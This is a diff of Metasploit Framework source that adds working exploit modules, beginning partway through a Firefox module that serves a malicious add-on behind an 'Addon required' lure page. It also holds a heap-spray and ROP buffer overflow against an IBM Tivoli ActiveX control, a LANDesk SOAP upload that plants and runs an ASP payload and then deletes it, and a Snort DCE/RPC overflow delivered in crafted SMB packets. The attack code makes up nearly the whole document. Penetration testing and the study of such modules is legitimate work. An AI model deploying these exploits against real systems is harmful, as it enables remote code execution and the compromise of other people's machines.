return
|
||||
end
|
||||
|
||||
# If we haven't returned yet, then this is a request for our xpi,
|
||||
# so build one
|
||||
|
||||
if target.name == 'Generic (Java Payload)'
|
||||
jar = p.encoded_jar
|
||||
jar.build_manifest(:main_class => "metasploit.Payload")
|
||||
payload_file = jar.pack
|
||||
payload_name='payload.jar'
|
||||
payload_script=%q|
|
||||
var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
|
||||
java.lang.System.setSecurityManager(null);
|
||||
var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
|
||||
var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
|
||||
m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
|
||||
|
|
||||
else
|
||||
payload_file = generate_payload_exe
|
||||
payload_name='payload.exe'
|
||||
payload_script=%q|
|
||||
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
|
||||
process.init(tmp);
|
||||
process.run(false,[],0);
|
||||
|
|
||||
end
|
||||
|
||||
zip = Rex::Zip::Archive.new
|
||||
xpi_guid = '{d0df471a-9896-4e6d-83e2-13a04ed6df33}' #TODO randomize!
|
||||
|
||||
bootstrap_script = %q|
|
||||
function startup(data, reason) {
|
||||
var file = Components.classes["@mozilla.org/file/directory_service;1"].
|
||||
getService(Components.interfaces.nsIProperties).
|
||||
get("ProfD", Components.interfaces.nsIFile);
|
||||
file.append("extensions");
|
||||
|
|
||||
bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
|
||||
bootstrap_script << %Q|payload_name="#{payload_name}";|
|
||||
bootstrap_script << %q|
|
||||
file.append(xpi_guid);
|
||||
file.append(payload_name);
|
||||
var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
|
||||
getService(Components.interfaces.nsIProperties).
|
||||
get("TmpD", Components.interfaces.nsIFile);
|
||||
tmp.append(payload_name);
|
||||
tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
|
||||
file.copyTo(tmp.parent, tmp.leafName);
|
||||
|
|
||||
bootstrap_script << payload_script
|
||||
|
||||
if (datastore['AutoUninstall'])
|
||||
bootstrap_script << %q|
|
||||
try { // Fx < 4.0
|
||||
Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
|
||||
} catch (e) {}
|
||||
try { // Fx 4.0 and later
|
||||
Components.utils.import("resource://gre/modules/AddonManager.jsm");
|
||||
AddonManager.getAddonByID(xpi_guid, function(addon) {
|
||||
addon.uninstall();
|
||||
});
|
||||
} catch (e) {}
|
||||
|
|
||||
end
|
||||
|
||||
bootstrap_script << "}"
|
||||
|
||||
zip.add_file('bootstrap.js', bootstrap_script)
|
||||
zip.add_file(payload_name, payload_file)
|
||||
zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
|
||||
zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
|
||||
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
|
||||
<Description about="urn:mozilla:install-manifest">
|
||||
<em:id>#{xpi_guid}</em:id>
|
||||
<em:name>#{datastore['ADDONNAME']}</em:name>
|
||||
<em:version>1.0</em:version>
|
||||
<em:bootstrap>true</em:bootstrap>
|
||||
<em:unpack>true</em:unpack>
|
||||
<em:targetApplication>
|
||||
<Description>
|
||||
<em:id>toolkit@mozilla.org</em:id>
|
||||
<em:minVersion>1.0</em:minVersion>
|
||||
<em:maxVersion>*</em:maxVersion>
|
||||
</Description>
|
||||
</em:targetApplication>
|
||||
<em:targetApplication>
|
||||
<Description>
|
||||
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
|
||||
<em:minVersion>1.0</em:minVersion>
|
||||
<em:maxVersion>*</em:maxVersion>
|
||||
</Description>
|
||||
</em:targetApplication>
|
||||
</Description>
|
||||
</RDF>|)
|
||||
zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
|
||||
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
|
||||
<script src="bootstrap.js"/>
|
||||
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
|
||||
</overlay>|)
|
||||
|
||||
print_status(
|
||||
"Sending xpi to #{cli.peerhost}. "+
|
||||
"Waiting for user to click 'accept'...")
|
||||
send_response( cli, zip.pack, { 'Content-Type' => 'application/x-xpinstall' } )
|
||||
handler( cli )
|
||||
end
|
||||
|
||||
def generate_html
|
||||
html = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
|
||||
html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
|
||||
html << %Q|<script>window.location.href="addon.xpi";</script>\n|
|
||||
html << %Q|</body></html>|
|
||||
return html
|
||||
end
|
||||
end
|
|
@ -0,0 +1,263 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:ua_minver => "6.0",
|
||||
:ua_maxver => "8.0",
|
||||
:javascript => true,
|
||||
:rank => NormalRanking,
|
||||
:classid => "{84B74E82-3475-420E-9949-773B4FB91771}",
|
||||
:vuln_test => "RunAndUploadFile",
|
||||
})
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow vulnerability in the
|
||||
Isig.isigCtl.1 ActiveX installed with IBM Tivoli Provisioning
|
||||
Manager Express for Software Distribution 4.1.1.
|
||||
|
||||
The vulnerability is found in the "RunAndUploadFile" method
|
||||
where the "OtherFields" parameter with user controlled data
|
||||
is used to build a "Content-Dispoition" header and attach
|
||||
contents in a insecure way which allows to overflow a buffer
|
||||
in the stack.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Andrea Micalizzi aka rgod', # Vulnerability discovery
|
||||
'juan vazquez', # Metasploit module
|
||||
'sinn3r' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-0198' ],
|
||||
[ 'OSVDB', '79735' ],
|
||||
[ 'BID', '52252' ],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-040/' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'migrate -f'
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# isig.dll 2.44.282.0
|
||||
[ 'Automatic', {} ],
|
||||
[
|
||||
'IE 6 on Windows XP SP3',
|
||||
{
|
||||
'Rop' => nil,
|
||||
'Offset' => 161, # length is strlen("submit") dependant
|
||||
'OffsetShell' => '0x800 - code.length',
|
||||
'ebp' => 0x09090909,
|
||||
'Ret' => 0x09090909
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 7 on Windows XP SP3',
|
||||
{
|
||||
'Rop' => nil,
|
||||
'Offset' => 161, # length is strlen("submit") dependant
|
||||
'OffsetShell' => '0x800 - code.length',
|
||||
'ebp' => 0x09090909,
|
||||
'Ret' => 0x09090909
|
||||
}
|
||||
],
|
||||
[
|
||||
'IE 8 on Windows XP SP3',
|
||||
{
|
||||
'Rop' => :jre,
|
||||
'Offset' => 161, # length is strlen("submit") dependant
|
||||
'OffsetShell' => '0x480',
|
||||
'ebp' => 0x09090920,
|
||||
'Ret' => 0x7c375a3d # stackpivot from msvcr71.dll # mov esp, ebp # pop ebp # ret
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Mar 01 2012",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def get_target(agent)
|
||||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
|
||||
return targets[1] #IE 6 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
|
||||
return targets[2] #IE 7 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
|
||||
return targets[3] #IE 8 on Windows XP SP3
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def get_payload(t, cli)
|
||||
|
||||
if t['Rop'].nil?
|
||||
code = ""
|
||||
else
|
||||
#Fix the stack to avoid anything busted
|
||||
code = "\x81\xC4\x54\xF2\xFF\xFF"
|
||||
end
|
||||
code << payload.encoded
|
||||
|
||||
# No rop. Just return the payload.
|
||||
return code if t['Rop'].nil?
|
||||
|
||||
# ROP chain generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :jre
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Using JRE ROP")
|
||||
exec_size = 0xffffffff - code.length + 1
|
||||
rop =
|
||||
[
|
||||
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
||||
exec_size, # Value to NEG
|
||||
0x7c347f98, # RETN (ROP NOP)
|
||||
0x7c3415a2, # JMP [EAX]
|
||||
0xffffffff,
|
||||
0x7c376402, # skip 4 bytes
|
||||
0x7c351e05, # NEG EAX # RETN
|
||||
0x7c345255, # INC EBX # FPATAN # RETN
|
||||
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
|
||||
0x7c344f87, # POP EDX # RETN
|
||||
0xffffffc0, # Value to negate, will become 0x00000040
|
||||
0x7c351eb1, # NEG EDX # RETN
|
||||
0x7c34d201, # POP ECX # RETN
|
||||
0x7c38b001, # &Writable location
|
||||
0x7c347f97, # POP EAX # RETN
|
||||
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
|
||||
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
|
||||
0x7c345c30, # ptr to 'push esp # ret '
|
||||
].pack("V*")
|
||||
end
|
||||
|
||||
code = rop + code
|
||||
return code
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
agent = request.headers['User-Agent']
|
||||
my_target = get_target(agent)
|
||||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Browser not supported: #{agent.to_s}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Client requesting: #{request.uri}")
|
||||
|
||||
p = get_payload(my_target, cli)
|
||||
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
|
||||
js_nops = Rex::Text.to_unescape("\x90"*4, Rex::Arch.endian(my_target.arch))
|
||||
|
||||
js_spray = <<-JS
|
||||
var heap_obj = new heapLib.ie(0x20000);
|
||||
var code = unescape("#{js_code}");
|
||||
var nops = unescape("#{js_nops}");
|
||||
|
||||
while (nops.length < 0x80000) nops += nops;
|
||||
var offset = nops.substring(0, #{my_target['OffsetShell']});
|
||||
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
||||
|
||||
while (shellcode.length < 0x40000) shellcode += shellcode;
|
||||
var block = shellcode.substring(0, (0x80000-6)/2);
|
||||
|
||||
heap_obj.gc();
|
||||
for (var i=0; i < 0x1A0; i++) {
|
||||
heap_obj.alloc(block);
|
||||
}
|
||||
|
||||
JS
|
||||
|
||||
js_spray = heaplib(js_spray, {:noobfu => true})
|
||||
|
||||
if datastore['OBFUSCATE']
|
||||
js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
|
||||
js_spray.obfuscate
|
||||
end
|
||||
|
||||
bof = rand_text_alpha(my_target['Offset'])
|
||||
bof << [my_target['ebp']].pack("V") # ebp
|
||||
bof << [my_target.ret].pack("V") # eip
|
||||
|
||||
html = <<-HTML
|
||||
<html>
|
||||
<head>
|
||||
<script>
|
||||
#{js_spray}
|
||||
</script>
|
||||
</head>
|
||||
<object classid='clsid:84B74E82-3475-420E-9949-773B4FB91771' id='isig'></object>
|
||||
<script>
|
||||
var url = "http://#{Rex::Socket.source_address('1.2.3.4')}:#{datastore['SRVPORT']}/tpmx/uploadEG2.do";
|
||||
var fields = "submit:#{bof};FROM_EMAIL:true;userKey:2";
|
||||
var flags = "-level5";
|
||||
msg = isig.RunAndUploadFile(url, fields, flags);
|
||||
</script>
|
||||
</html>
|
||||
HTML
|
||||
|
||||
html = html.gsub(/^\t\t/, '')
|
||||
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending html")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
|
||||
* Vulnerability notes
|
||||
|
||||
The Dangerous strcat allows to attach user-controlled contents after
|
||||
the Content-disposition header:
|
||||
|
||||
.text:100040B0 Src = byte ptr -100h
|
||||
...
|
||||
.text:100040DD push [ebp+Source] ; Source => User controlled via "fields" param
|
||||
.text:100040E0 lea eax, [ebp+Src]
|
||||
.text:100040E6 push eax ; Dest => Local variable where the Content-disposition header
|
||||
; has been stored
|
||||
.text:100040E7 call _strcat ; strcat used by this module to overflow
|
||||
|
||||
Function isn't protected with stack cookies so get
|
||||
the control flow is easy by overwriting the saved EIP
|
||||
on the stack.
|
||||
|
||||
=end
|
|
@ -0,0 +1,178 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'LANDesk Lenovo ThinkManagement Console Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module can be used to execute a payload on LANDesk Lenovo
|
||||
ThinkManagement Suite 9.0.2 and 9.0.3.
|
||||
|
||||
The payload is uploaded as an ASP script by sending a specially crafted
|
||||
SOAP request to "/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"
|
||||
, via a "RunAMTCommand" operation with the command '-PutUpdateFileCore'
|
||||
as the argument.
|
||||
|
||||
After execution, the ASP script with the payload is deleted by sending
|
||||
another specially crafted SOAP request to "WSVulnerabilityCore/VulCore.asmx"
|
||||
via a "SetTaskLogByFile" operation.
|
||||
},
|
||||
'Author' => [
|
||||
'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'Version' => '$Revision: $',
|
||||
'Platform' => 'win',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2012-1195'],
|
||||
['CVE', '2012-1196'],
|
||||
['OSVDB', '79276'],
|
||||
['OSVDB', '79277'],
|
||||
['BID', '52023'],
|
||||
['URL', 'http://www.exploit-db.com/exploits/18622/'],
|
||||
['URL', 'http://www.exploit-db.com/exploits/18623/']
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2', { } ],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Feb 15 2012'
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The URI path of the LANDesk Lenovo ThinkManagement Console", '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
# Generate the ASP containing the EXE containing the payload
|
||||
exe = generate_payload_exe
|
||||
asp = Msf::Util::EXE.to_exe_asp(exe)
|
||||
|
||||
# htmlentities like encoding
|
||||
asp = asp.gsub("&", "&").gsub("\"", """).gsub("'", "'").gsub("<", "<").gsub(">", ">")
|
||||
|
||||
uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")
|
||||
upload_random = rand_text_alpha(rand(6) + 6)
|
||||
upload_xml_path = "ldlogon\\#{upload_random}.asp"
|
||||
|
||||
soap = <<-eos
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<soap:Body>
|
||||
<RunAMTCommand xmlns="http://tempuri.org/">
|
||||
<Command>-PutUpdateFileCore</Command>
|
||||
<Data1>#{rand_text_alpha(rand(4) + 4)}</Data1>
|
||||
<Data2>#{upload_xml_path}</Data2>
|
||||
<Data3>#{asp}</Data3>
|
||||
<ReturnString>#{rand_text_alpha(rand(4) + 4)}</ReturnString>
|
||||
</RunAMTCommand>
|
||||
</soap:Body>
|
||||
</soap:Envelope>
|
||||
eos
|
||||
|
||||
#
|
||||
# UPLOAD
|
||||
#
|
||||
attack_url = uri_path + "landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"
|
||||
print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => attack_url,
|
||||
'method' => 'POST',
|
||||
'ctype' => 'text/xml; charset=utf-8',
|
||||
'headers' => {
|
||||
'SOAPAction' => "\"http://tempuri.org/RunAMTCommand\"",
|
||||
},
|
||||
'data' => soap,
|
||||
}, 20)
|
||||
|
||||
if (! res)
|
||||
print_status("#{peer} - Timeout: Trying to execute the payload anyway")
|
||||
elsif (res.code < 200 or res.code >= 300)
|
||||
print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]")
|
||||
return
|
||||
end
|
||||
|
||||
#
|
||||
# EXECUTE
|
||||
#
|
||||
upload_path = uri_path + "ldlogon/#{upload_random}.asp"
|
||||
print_status("#{peer} - Executing #{upload_path}...")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => upload_path,
|
||||
'method' => 'GET'
|
||||
}, 20)
|
||||
|
||||
if (! res)
|
||||
print_error("#{peer} - Execution failed on #{upload_path} [No Response]")
|
||||
return
|
||||
end
|
||||
|
||||
if (res.code < 200 or res.code >= 300)
|
||||
print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# DELETE
|
||||
#
|
||||
soap = <<-eos
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<soap:Body>
|
||||
<SetTaskLogByFile xmlns="http://tempuri.org/">
|
||||
<computerIdn>1</computerIdn>
|
||||
<taskid>1</taskid>
|
||||
<filename>../#{upload_random}.asp</filename>
|
||||
</SetTaskLogByFile>
|
||||
</soap:Body>
|
||||
</soap:Envelope>
|
||||
eos
|
||||
|
||||
attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx"
|
||||
print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => attack_url,
|
||||
'method' => 'POST',
|
||||
'ctype' => 'text/xml; charset=utf-8',
|
||||
'headers' => {
|
||||
'SOAPAction' => "\"http://tempuri.org/SetTaskLogByFile\"",
|
||||
},
|
||||
'data' => soap,
|
||||
}, 20)
|
||||
|
||||
if (! res)
|
||||
print_error("#{peer} - Deletion failed at #{attack_url} [No Response]")
|
||||
return
|
||||
elsif (res.code < 200 or res.code >= 300)
|
||||
print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]")
|
||||
return
|
||||
end
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,158 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Capture
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Snort 2 DCE/RPC preprocessor Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module allows remote attackers to execute arbitrary code by exploiting the
|
||||
Snort service via crafted SMB traffic. The vulnerability is due to a boundary
|
||||
error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,
|
||||
which may result a stack-based buffer overflow with a specially crafted packet
|
||||
sent on a network that is monitored by Snort.
|
||||
|
||||
Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.
|
||||
|
||||
Any host on the Snort network may be used as the remote host. The remote host does not
|
||||
need to be running the SMB service for the exploit to be successful.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Neel Mehta', #Original discovery (IBM X-Force)
|
||||
'Carsten Maartmann-Moe <carsten[at]carmaa.com>' #Metasploit
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '67988' ],
|
||||
[ 'CVE', '2006-5276' ],
|
||||
[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 390,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows Universal',
|
||||
{
|
||||
'Ret' => 0x00407c01, # JMP ESP snort.exe
|
||||
'Offset' => 289 # The number of bytes before overwrite
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Feb 19 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(139),
|
||||
OptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]),
|
||||
OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])
|
||||
], self.class)
|
||||
|
||||
deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
|
||||
end
|
||||
|
||||
def exploit
|
||||
open_pcap
|
||||
|
||||
shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)
|
||||
|
||||
p = buildpacket(shost, rhost, rport.to_i)
|
||||
|
||||
print_status("Sending crafted SMB packet from #{shost} to #{rhost}:#{rport}...")
|
||||
|
||||
capture_sendto(p, rhost)
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
def buildpacket(shost, rhost, rport)
|
||||
p = PacketFu::TCPPacket.new
|
||||
p.ip_saddr = shost
|
||||
p.ip_daddr = rhost
|
||||
p.tcp_dport = rport
|
||||
p.tcp_flags.psh = 1
|
||||
p.tcp_flags.ack = 1
|
||||
|
||||
# SMB packet borrowed from http://exploit-db.com/exploits/3362
|
||||
|
||||
# NetBIOS Session Service, value is the number of bytes in the TCP segment,
|
||||
# must be greater than the total size of the payload. Statically set.
|
||||
header = "\x00\x00\xde\xad"
|
||||
|
||||
# SMB Header
|
||||
header << "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
|
||||
header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
|
||||
header << "\x00\x08\x30\x00"
|
||||
|
||||
# Tree Connect AndX Request
|
||||
header << "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
|
||||
header << "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
|
||||
header << "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
|
||||
header << "\x3f\x3f\x3f\x3f\x3f\x00"
|
||||
|
||||
# NT Create AndX Request
|
||||
header << "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
|
||||
header << "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
header << "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
|
||||
header << "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
|
||||
header << "\x63\x00\x00\x00"
|
||||
|
||||
# Write AndX Request #1
|
||||
header << "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
|
||||
header << "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
|
||||
header << "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
|
||||
header << "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
|
||||
header << "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
|
||||
header << "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
|
||||
header << "\x2b\x10\x48\x60\x02\x00\x00\x00"
|
||||
|
||||
# Write AndX Request #2
|
||||
header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
|
||||
header << "\x00\x48\x00\x00\x00\xff\x01"
|
||||
|
||||
tail = "\x00\x00\x00\x00\x49\x00\xee"
|
||||
|
||||
# Return address
|
||||
eip = [target['Ret']].pack('V')
|
||||
|
||||
# Sploit
|
||||
sploit = make_nops(10)
|
||||
sploit << payload.encoded
|
||||
|
||||
# Padding (to pass size check)
|
||||
sploit << make_nops(1)
|
||||
|
||||
# The size to be included in Write AndX Request #2, including sploit payload
|
||||
requestsize = [(sploit.size() + target['Offset'])].pack('v')
|
||||
|
||||
# Assemble the parts into one package
|
||||
p.payload = header << requestsize << tail << eip << sploit
|
||||
p.recalc
|
||||
|
||||
p
|
||||
end
|
||||
end
|
|
@ -112,6 +112,7 @@ module Msf
|
|||
|
||||
def cmd_nessus_save(*args)
|
||||
#if we are logged in, save session details to nessus.yaml
|
||||
@nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml"
|
||||
if args[0] == "-h"
|
||||
print_status("Usage: ")
|
||||
print_status(" nessus_save")
|
||||
|
@ -319,7 +320,8 @@ module Msf
|
|||
end
|
||||
|
||||
def cmd_nessus_connect(*args)
|
||||
|
||||
# Check if config file exists and load it
|
||||
@nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml"
|
||||
if ! args[0]
|
||||
if File.exist?("#{@nessus_yaml}")
|
||||
lconfig = YAML.load_file("#{@nessus_yaml}")
|
||||
|
|
Loading…
Reference in New Issue